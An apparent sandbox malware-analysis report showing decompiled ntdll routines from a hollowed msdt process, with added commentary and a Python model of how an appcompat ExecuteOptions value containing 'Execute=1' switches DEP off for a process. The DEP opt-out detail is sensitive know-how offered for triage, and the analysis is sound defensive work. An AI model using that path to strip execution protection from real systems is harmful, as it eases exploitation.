                                                                    				_v8 = _t33 ^ _t73; // cookie ^ ebp, verified by the epilogue call below
                                                                    				_v548 = _v548 & 0x00000000;
                                                                    				_t72 = _a4;
                                                                    				// Looks up CheckAppHelp for this image under Image File Execution Options
                                                                    				// (see the debug string that follows); a zero value skips everything.
                                                                    				if(E025C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                    					__eflags = _v548;
                                                                    					if(_v548 == 0) {
                                                                    						goto L1;
                                                                    					}
                                                                    					_t62 = _t72 + 0x24;
                                                                    					// E025E3F92 is a DbgPrintEx-style trace: component 0x55 (matches DPFLTR_LDR_ID, inferred), level 3.
                                                                    					E025E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                    					_t71 = 0x214;
                                                                    					_v544 = 0x214; // in/out byte size of the 0x214-byte stack buffer _v540
                                                                    					E0259DFC0( &_v540, 0, 0x214); // memset-like zero fill
                                                                    					_t75 = _t74 + 0x20;
                                                                    					// Import thunk for BaseQueryModuleData (KERNEL32, ref 025E3F12): fetch the
                                                                    					// "ExecuteOptions" value for this module from the appcompat database.
                                                                    					_t46 =  *0x2674218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                    					__eflags = _t46;
                                                                    					if(_t46 == 0) {
                                                                    						goto L1;
                                                                    					}
                                                                    					_t47 = _v544;
                                                                    					__eflags = _t47;
                                                                    					if(_t47 == 0) { // nothing returned
                                                                    						goto L1;
                                                                    					}
                                                                    					__eflags = _t47 - 0x214;
                                                                    					if(_t47 >= 0x214) { // value must fit below the buffer size
                                                                    						goto L1;
                                                                    					}
                                                                    					_push(_t62);
                                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0; // NUL-terminate the wide string at byte length >> 1
                                                                    					E025E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                    					// Wide-string search for "Execute=1"; the result is tested as a pointer, so a
                                                                    					// substring match anywhere in the value is enough (inferred, wcsstr-like).
                                                                    					_t52 = E025A0D27( &_v540, L"Execute=1");
                                                                    					_t76 = _t75 + 0x1c;
                                                                    					_push(_t62);
                                                                    					__eflags = _t52;
                                                                    					if(_t52 == 0) {
                                                                    						// No Execute=1: treat the value as a space-separated list of section entries.
                                                                    						E025E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                    						_t71 =  &_v540;
                                                                    						_t56 = _t73 + _v544 - 0x218; // end of the returned text
                                                                    						_t77 = _t76 + 0x14;
                                                                    						_v552 = _t56;
                                                                    						__eflags = _t71 - _t56;
                                                                    						if(_t71 >= _t56) {
                                                                    							goto L1;
                                                                    						} else {
                                                                    							goto L10;
                                                                    						}
                                                                    						while(1) {
                                                                    							L10:
                                                                    							_t62 = E025A8375(_t71, 0x20); // find the next L' ' (wcschr-like, inferred)
                                                                    							_pop(_t69);
                                                                    							__eflags = _t62;
                                                                    							if(__eflags != 0) {
                                                                    								__eflags = 0;
                                                                    								 *_t62 = 0; // cut the current token at the space
                                                                    							}
                                                                    							E025E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                    							_t77 = _t77 + 0x10;
                                                                    							E0260E8DB(_t69, _t70, __eflags, _t72, _t71); // per-section handler for this token
                                                                    							__eflags = _t62;
                                                                    							if(_t62 == 0) { // last token processed
                                                                    								goto L1;
                                                                    							}
                                                                    							_t31 = _t62 + 2; // 0x2   one wchar past the space
                                                                    							_t71 = _t31;
                                                                    							__eflags = _t71 - _v552;
                                                                    							if(_t71 >= _v552) {
                                                                    								goto L1;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					// Only reached when the search above succeeded: DEP is switched off for the process.
                                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                    					_push(3);
                                                                    					_push(0x55);
                                                                    					E025E3F92();
                                                                    					_t38 = 1;
                                                                    					L2:
                                                                    					return E0259E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72); // __security_check_cookie-style epilogue
                                                                    				}
                                                                    				L1:
                                                                    				_t38 = 0;
                                                                    				goto L2;
                                                                    			}
                                                                    (instruction address column of the E025C7EFD listing above, detached by extraction: 0x025c7f08 to 0x025c7f47, with inlined blocks at 0x025e3ead to 0x025e3f86 and 0x025ee304 to 0x025ee374)

                                                                    APIs
                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025E3F12
                                                                    Strings
                                                                    • Execute=1, xrefs: 025E3F5E
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025E3F75
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025E3F4A
                                                                    • ExecuteOptions, xrefs: 025E3F04
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 025EE345
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025EE2FB
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025E3EC4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: BaseDataModuleQuery
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 3901378454-484625025
                                                                    • Opcode ID: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                                                    • Instruction ID: 3b822689b25480092df294637efd8dee6125b0289cc140f5ac885a91bfd36f44
                                                                    • Opcode Fuzzy Hash: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                                                    • Instruction Fuzzy Hash: 1541BB7164031D7AEF24DAA4DCC5FEAB3BDBB58704F100499A505E6080F7709A458F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
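The decompiled E025C7EFD routine is hard to read because of the goto-based control flow, so the following is a readable model of its ExecuteOptions decision. It is an added example, not code from the report or from ntdll; the names BUF_BYTES, EXECUTE_FLAG, parse_execute_options and dep_disabled are assumptions, the substring semantics of the "Execute=1" test are inferred from the listing testing the search result as a pointer, and the token window is modelled as ending at the reported length (the decompiled offsets differ by a word or two and are not reproduced exactly). Sample values are constructed, not taken from a real application compatibility database.

```python
# Added example (not code from the report or from ntdll): a readable model of the
# ExecuteOptions decision in the decompiled routine E025C7EFD above.
# Assumed names: BUF_BYTES, EXECUTE_FLAG, parse_execute_options, dep_disabled.

BUF_BYTES = 0x214            # size of the stack buffer the listing zeroes and fills
EXECUTE_FLAG = "Execute=1"   # the literal the listing searches for


def parse_execute_options(raw: bytes, byte_len: int):
    """Classify an ExecuteOptions value the way the listing does.

    raw is the UTF-16LE text the appcompat query wrote into the buffer and
    byte_len the byte count it reported. Returns one of
      ("ignored", reason)       - the listing jumps to L1 and returns 0
      ("disable_dep", None)     - "Execute=1" found, the listing returns 1
      ("sections", [tokens])    - no flag; the space-separated entries that
                                  the listing hands to the per-section helper
    """
    if byte_len == 0:
        return ("ignored", "empty value")
    if byte_len >= BUF_BYTES:
        return ("ignored", "reported length not below buffer size")
    nchars = byte_len >> 1                    # terminator index used by the listing
    text = raw[: nchars * 2].decode("utf-16-le", errors="replace")
    # The listing tests the search result for a non-zero pointer, so a substring
    # match anywhere in the value is enough (inferred; not a whole-token compare).
    if EXECUTE_FLAG in text:
        return ("disable_dep", None)
    sections = []
    start = 0
    while start < nchars:                     # _t71 < _v552
        space = text.find(" ", start)         # wide-char search for 0x20
        if space == -1:                       # no further space: last token, stop
            sections.append(text[start:])
            break
        sections.append(text[start:space])    # *_t62 = 0 cuts the token here
        start = space + 1                     # _t62 + 2 bytes: one wchar past the space
    return ("sections", sections)


def dep_disabled(raw: bytes, byte_len: int) -> bool:
    """True exactly when the listing would return 1 (execution protection off)."""
    return parse_execute_options(raw, byte_len)[0] == "disable_dep"


def _wide(s: str) -> bytes:
    """Constructed UTF-16LE input, shaped like what the query would return."""
    return s.encode("utf-16-le")


if __name__ == "__main__":
    # Constructed sample values, not taken from a real appcompat database.
    for sample in ("Execute=1", "SomeOption=1 Execute=1", ".text .rdata", ""):
        w = _wide(sample)
        print(repr(sample), "->", parse_execute_options(w, len(w)))
```

The point worth keeping in mind when triaging a hollowed process such as this one: the code is ntdll's own, not the sample's, and the path that matters is the one that ends in "turning off execution protection for the process". Anything that can plant an ExecuteOptions value containing Execute=1 for an image therefore decides whether DEP applies to it, so a per-image DEP opt-out in the appcompat data is a setting to check alongside the IFEO keys the routine consults first.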

                                                                    C-Code - Quality: 100%
                                                                    			// Second routine from the same ntdll image; the listing is truncated in the
                                                                    			// report. What is visible is consistent with an IPv6 text-to-address parser:
                                                                    			// it dispatches on ':' (0x3a) and '.' (0x2e), converts groups with E025D0CFA
                                                                    			// in base 0x10 and dotted-quad bytes in base 0xa, tracks a count of 7 or 8
                                                                    			// groups, and on success shifts the groups after a "::" gap with the
                                                                    			// memmove-like E025A8980 and zero-fills the gap with E0259DFC0. This reading
                                                                    			// is inferred from the constants and the format strings above, not from symbols.
                                                                    			E025D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				void* _t108;
                                                                    				void* _t116;
                                                                    				char _t120;
                                                                    				short _t121;
                                                                    				void* _t128;
                                                                    				intOrPtr* _t130;
                                                                    				char _t132;
                                                                    				short _t133;
                                                                    				intOrPtr _t141;
                                                                    				signed int _t156;
                                                                    				signed int _t174;
                                                                    				intOrPtr _t177;
                                                                    				intOrPtr* _t179;
                                                                    				intOrPtr _t180;
                                                                    				void* _t183;
                                                                    
                                                                    				_t179 = _a4;
                                                                    				_t141 =  *_t179;
                                                                    				_v16 = 0;
                                                                    				_v28 = 0;
                                                                    				_v8 = 0;
                                                                    				_v24 = 0;
                                                                    				_v12 = 0;
                                                                    				_v32 = 0;
                                                                    				_v20 = 0;
                                                                    				if(_t141 == 0) {
                                                                    					L41:
                                                                    					 *_a8 = _t179;
                                                                    					_t180 = _v24;
                                                                    					if(_t180 != 0) {
                                                                    						if(_t180 != 3) {
                                                                    							goto L6;
                                                                    						}
                                                                    						_v8 = _v8 + 1;
                                                                    					}
                                                                    					_t174 = _v32;
                                                                    					if(_t174 == 0) {
                                                                    						if(_v8 == 7) {
                                                                    							goto L43;
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    					L43:
                                                                    					if(_v16 != 1) {
                                                                    						if(_v16 != 2) {
                                                                    							goto L6;
                                                                    						}
                                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                    						L47:
                                                                    						if(_t174 != 0) {
                                                                    							E025A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                    							_t116 = 8;
                                                                    							E0259DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                    						}
                                                                    						return 0;
                                                                    					}
                                                                    					if(_t180 != 0) {
                                                                    						if(_v12 > 3) {
                                                                    							goto L6;
                                                                    						}
                                                                    						_t120 = E025D0CFA(_v28, 0, 0xa);
                                                                    						_t183 = _t183 + 0xc;
                                                                    						if(_t120 > 0xff) {
                                                                    							goto L6;
                                                                    						}
                                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                    						goto L47;
                                                                    					}
                                                                    					if(_v12 > 4) {
                                                                    						goto L6;
                                                                    					}
                                                                    					_t121 = E025D0CFA(_v28, _t180, 0x10);
                                                                    					_t183 = _t183 + 0xc;
                                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                    					goto L47;
                                                                    				} else {
                                                                    					while(1) {
                                                                    						_t123 = _v16;
                                                                    						if(_t123 == 0) {
                                                                    							goto L7;
                                                                    						}
                                                                    						_t108 = _t123 - 1;
                                                                    						if(_t108 != 0) {
                                                                    							goto L1;
                                                                    						}
                                                                    						_t178 = _t141;
                                                                    						if(E025D06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                    							if(E025D06BA(_t135, _t178) == 0 || E025D0A5B(_t136, _t178) == 0) {
                                                                    								if(_t141 != 0x3a) {
                                                                    									if(_t141 == 0x2e) {
                                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                    											goto L41;
                                                                    										} else {
                                                                    											_v24 = _v24 + 1;
                                                                    											L27:
                                                                    											_v16 = _v16 & 0x00000000;
                                                                    											L28:
                                                                    											if(_v28 == 0) {
                                                                    												goto L20;
                                                                    											}
                                                                    											_t177 = _v24;
                                                                    											if(_t177 != 0) {
                                                                    												if(_v12 > 3) {
                                                                    													L6:
                                                                    													return 0xc000000d;
                                                                    												}
                                                                    												_t132 = E025D0CFA(_v28, 0, 0xa);
                                                                    												_t183 = _t183 + 0xc;
                                                                    												if(_t132 > 0xff) {
                                                                    													goto L6;
                                                                    												}
                                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                    												goto L20;
                                                                    											}
                                                                    											if(_v12 > 4) {
                                                                    												goto L6;
                                                                    											}
                                                                    											_t133 = E025D0CFA(_v28, 0, 0x10);
                                                                    											_t183 = _t183 + 0xc;
                                                                    											_v20 = _v20 + 1;
                                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                    											goto L20;
                                                                    										}
                                                                    									}
                                                                    									goto L41;
                                                                    								}
                                                                    								if(_v24 > 0 || _v8 > 6) {
                                                                    									goto L41;
                                                                    								} else {
                                                                    									_t130 = _t179 + 1;
                                                                    									if( *_t130 == _t141) {
                                                                    										if(_v32 != 0) {
                                                                    											goto L41;
                                                                    										}
                                                                    										_v32 = _v8 + 1;
                                                                    										_t156 = 2;
                                                                    										_v8 = _v8 + _t156;
                                                                    										L34:
                                                                    										_t179 = _t130;
                                                                    										_v16 = _t156;
                                                                    										goto L28;
                                                                    									}
                                                                    									_v8 = _v8 + 1;
                                                                    									goto L27;
                                                                    								}
                                                                    							} else {
                                                                    								_v12 = _v12 + 1;
                                                                    								if(_v24 > 0) {
                                                                    									goto L41;
                                                                    								}
                                                                    								_a7 = 1;
                                                                    								goto L20;
                                                                    							}
                                                                    						} else {
                                                                    							_v12 = _v12 + 1;
                                                                    							L20:
                                                                    							_t179 = _t179 + 1;
                                                                    							_t141 =  *_t179;
                                                                    							if(_t141 == 0) {
                                                                    								goto L41;
                                                                    							}
                                                                    							continue;
                                                                    						}
                                                                    						L7:
                                                                    						if(_t141 == 0x3a) {
                                                                    							if(_v24 > 0 || _v8 > 0) {
                                                                    								goto L41;
                                                                    							} else {
                                                                    								_t130 = _t179 + 1;
                                                                    								if( *_t130 != _t141) {
                                                                    									goto L41;
                                                                    								}
                                                                    								_v20 = _v20 + 1;
                                                                    								_t156 = 2;
                                                                    								_v32 = 1;
                                                                    								_v8 = _t156;
                                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                    								goto L34;
                                                                    							}
                                                                    						}
                                                                    						L8:
                                                                    						if(_v8 > 7) {
                                                                    							goto L41;
                                                                    						}
                                                                    						_t142 = _t141;
                                                                    						if(E025D06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                    							if(E025D06BA(_t124, _t142) == 0 || E025D0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                    								goto L41;
                                                                    							} else {
                                                                    								_t128 = 1;
                                                                    								_a7 = 1;
                                                                    								_v28 = _t179;
                                                                    								_v16 = 1;
                                                                    								_v12 = 1;
                                                                    								L39:
                                                                    								if(_v16 == _t128) {
                                                                    									goto L20;
                                                                    								}
                                                                    								goto L28;
                                                                    							}
                                                                    						} else {
                                                                    							_a7 = 0;
                                                                    							_v28 = _t179;
                                                                    							_v16 = 1;
                                                                    							_v12 = 1;
                                                                    							goto L20;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L1:
                                                                    				_t123 = _t108 == 1;
                                                                    				if(_t108 == 1) {
                                                                    					goto L8;
                                                                    				}
                                                                    				_t128 = 1;
                                                                    				goto L39;
                                                                    			}

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: __fassign
                                                                    • String ID: .$:$:
                                                                    • API String ID: 3965848254-2308638275
                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                    • Instruction ID: 094c17f6aaa029459ab872151b7308a5b3f065f220acf84a0ea1f6b422279323
                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                    • Instruction Fuzzy Hash: 22A18B7190420AEEDF34DF6CC8446BEBBB9BF45309F24886AD842A72E0D7349645CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 49%
                                                                    			E025D0554(signed int _a4, char _a8) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int* _t49;
                                                                    				signed int _t51;
                                                                    				signed int _t56;
                                                                    				signed int _t58;
                                                                    				signed int _t61;
                                                                    				signed int _t63;
                                                                    				void* _t66;
                                                                    				intOrPtr _t67;
                                                                    				signed int _t70;
                                                                    				void* _t75;
                                                                    				signed int _t81;
                                                                    				signed int _t84;
                                                                    				void* _t86;
                                                                    				signed int _t93;
                                                                    				signed int _t96;
                                                                    				intOrPtr _t105;
                                                                    				signed int _t107;
                                                                    				void* _t110;
                                                                    				signed int _t115;
                                                                    				signed int* _t119;
                                                                    				void* _t125;
                                                                    				void* _t126;
                                                                    				signed int _t128;
                                                                    				signed int _t130;
                                                                    				signed int _t138;
                                                                    				signed int _t144;
                                                                    				void* _t158;
                                                                    				void* _t159;
                                                                    				void* _t160;
                                                                    
                                                                    				_t96 = _a4;
                                                                    				_t115 =  *(_t96 + 0x28);
                                                                    				_push(_t138);
                                                                    				if(_t115 < 0) {
                                                                    					_t105 =  *[fs:0x18];
                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						__eflags = _t115 | 0xffffffff;
                                                                    						asm("lock xadd [eax], edx");
                                                                    						return 1;
                                                                    					}
                                                                    				} else {
                                                                    					L6:
                                                                    					_push(_t128);
                                                                    					while(1) {
                                                                    						L7:
                                                                    						__eflags = _t115;
                                                                    						if(_t115 >= 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _a8;
                                                                    						if(_a8 == 0) {
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						} else {
                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                    							_t49 = _t96 + 0x1c;
                                                                    							_t106 = 1;
                                                                    							asm("lock xadd [edx], ecx");
                                                                    							_t115 =  *(_t96 + 0x28);
                                                                    							__eflags = _t115;
                                                                    							if(_t115 < 0) {
                                                                    								L23:
                                                                    								_t130 = 0;
                                                                    								__eflags = 0;
                                                                    								while(1) {
                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                    									asm("sbb esi, esi");
                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
                                                                    									_push(_t144);
                                                                    									_push(0);
                                                                    									_t51 = E0258F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                    									__eflags = _t51 - 0x102;
                                                                    									if(_t51 != 0x102) {
                                                                    										break;
                                                                    									}
                                                                    									_t106 =  *(_t144 + 4);
                                                                    									_t126 =  *_t144;
                                                                    									_t86 = E025D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                    									_push(_t126);
                                                                    									_push(_t86);
                                                                    									E025E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                    									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                    									_t130 = _t130 + 1;
                                                                    									_t160 = _t158 + 0x28;
                                                                    									__eflags = _t130 - 2;
                                                                    									if(__eflags > 0) {
                                                                    										E0261217A(_t106, __eflags, _t96);
                                                                    									}
                                                                    									_push("RTL: Re-Waiting\n");
                                                                    									_push(0);
                                                                    									_push(0x65);
                                                                    									E025E3F92();
                                                                    									_t158 = _t160 + 0xc;
                                                                    								}
                                                                    								__eflags = _t51;
                                                                    								if(__eflags < 0) {
                                                                    									_push(_t51);
                                                                    									E025D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                    									asm("int3");
                                                                    									while(1) {
                                                                    										L32:
                                                                    										__eflags = _a8;
                                                                    										if(_a8 == 0) {
                                                                    											break;
                                                                    										}
                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                    										_t119 = _t96 + 0x24;
                                                                    										_t107 = 1;
                                                                    										asm("lock xadd [eax], ecx");
                                                                    										_t56 =  *(_t96 + 0x28);
                                                                    										_a4 = _t56;
                                                                    										__eflags = _t56;
                                                                    										if(_t56 != 0) {
                                                                    											L40:
                                                                    											_t128 = 0;
                                                                    											__eflags = 0;
                                                                    											while(1) {
                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                    												asm("sbb esi, esi");
                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
                                                                    												_push(_t138);
                                                                    												_push(0);
                                                                    												_t58 = E0258F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                    												__eflags = _t58 - 0x102;
                                                                    												if(_t58 != 0x102) {
                                                                    													break;
                                                                    												}
                                                                    												_t107 =  *(_t138 + 4);
                                                                    												_t125 =  *_t138;
                                                                    												_t75 = E025D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                    												_push(_t125);
                                                                    												_push(_t75);
                                                                    												E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                    												E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                    												_t128 = _t128 + 1;
                                                                    												_t159 = _t158 + 0x28;
                                                                    												__eflags = _t128 - 2;
                                                                    												if(__eflags > 0) {
                                                                    													E0261217A(_t107, __eflags, _t96);
                                                                    												}
                                                                    												_push("RTL: Re-Waiting\n");
                                                                    												_push(0);
                                                                    												_push(0x65);
                                                                    												E025E3F92();
                                                                    												_t158 = _t159 + 0xc;
                                                                    											}
                                                                    											__eflags = _t58;
                                                                    											if(__eflags < 0) {
                                                                    												_push(_t58);
                                                                    												E025D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                    												asm("int3");
                                                                    												_t61 =  *_t107;
                                                                    												 *_t107 = 0;
                                                                    												__eflags = _t61;
                                                                    												if(_t61 == 0) {
                                                                    													L1:
                                                                    													_t63 = E025B5384(_t138 + 0x24);
                                                                    													if(_t63 != 0) {
                                                                    														goto L52;
                                                                    													} else {
                                                                    														goto L2;
                                                                    													}
                                                                    												} else {
                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                    													_push( &_a4);
                                                                    													_push(_t61);
                                                                    													_t70 = E0258F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                    													__eflags = _t70;
                                                                    													if(__eflags >= 0) {
                                                                    														goto L1;
                                                                    													} else {
                                                                    														_push(_t70);
                                                                    														E025D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                    														L52:
                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                    														_push( &_a4);
                                                                    														_push(1);
                                                                    														_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                    														__eflags = _t63;
                                                                    														if(__eflags >= 0) {
                                                                    															L2:
                                                                    															return _t63;
                                                                    														} else {
                                                                    															_push(_t63);
                                                                    															E025D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                    															_push( &_a4);
                                                                    															_push(1);
                                                                    															_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                    															__eflags = _t63;
                                                                    															if(__eflags >= 0) {
                                                                    																goto L2;
                                                                    															} else {
                                                                    																_push(_t63);
                                                                    																_t66 = E025D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                    																asm("int3");
                                                                    																while(1) {
                                                                    																	_t110 = _t66;
                                                                    																	__eflags = _t66 - 1;
                                                                    																	if(_t66 != 1) {
                                                                    																		break;
                                                                    																	}
                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                    																	_t66 = _t110;
                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                    																	__eflags = _t66 - _t110;
                                                                    																	if(_t66 != _t110) {
                                                                    																		continue;
                                                                    																	} else {
                                                                    																		_t67 =  *[fs:0x18];
                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                    																		return _t67;
                                                                    																	}
                                                                    																	goto L58;
                                                                    																}
                                                                    																E025B5329(_t110, _t138);
                                                                    																return E025B53A5(_t138, 1);
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											} else {
                                                                    												_t56 =  *(_t96 + 0x28);
                                                                    												goto L3;
                                                                    											}
                                                                    										} else {
                                                                    											_t107 =  *_t119;
                                                                    											__eflags = _t107;
                                                                    											if(__eflags > 0) {
                                                                    												while(1) {
                                                                    													_t81 = _t107;
                                                                    													asm("lock cmpxchg [edi], esi");
                                                                    													__eflags = _t81 - _t107;
                                                                    													if(_t81 == _t107) {
                                                                    														break;
                                                                    													}
                                                                    													_t107 = _t81;
                                                                    													__eflags = _t81;
                                                                    													if(_t81 > 0) {
                                                                    														continue;
                                                                    													}
                                                                    													break;
                                                                    												}
                                                                    												_t56 = _a4;
                                                                    												__eflags = _t107;
                                                                    											}
                                                                    											if(__eflags != 0) {
                                                                    												while(1) {
                                                                    													L3:
                                                                    													__eflags = _t56;
                                                                    													if(_t56 != 0) {
                                                                    														goto L32;
                                                                    													}
                                                                    													_t107 = _t107 | 0xffffffff;
                                                                    													_t56 = 0;
                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                    													__eflags = 0;
                                                                    													if(0 != 0) {
                                                                    														continue;
                                                                    													} else {
                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    														return 1;
                                                                    													}
                                                                    													goto L58;
                                                                    												}
                                                                    												continue;
                                                                    											} else {
                                                                    												goto L40;
                                                                    											}
                                                                    										}
                                                                    										goto L58;
                                                                    									}
                                                                    									__eflags = 0;
                                                                    									return 0;
                                                                    								} else {
                                                                    									_t115 =  *(_t96 + 0x28);
                                                                    									continue;
                                                                    								}
                                                                    							} else {
                                                                    								_t106 =  *_t49;
                                                                    								__eflags = _t106;
                                                                    								if(__eflags > 0) {
                                                                    									while(1) {
                                                                    										_t93 = _t106;
                                                                    										asm("lock cmpxchg [edi], esi");
                                                                    										__eflags = _t93 - _t106;
                                                                    										if(_t93 == _t106) {
                                                                    											break;
                                                                    										}
                                                                    										_t106 = _t93;
                                                                    										__eflags = _t93;
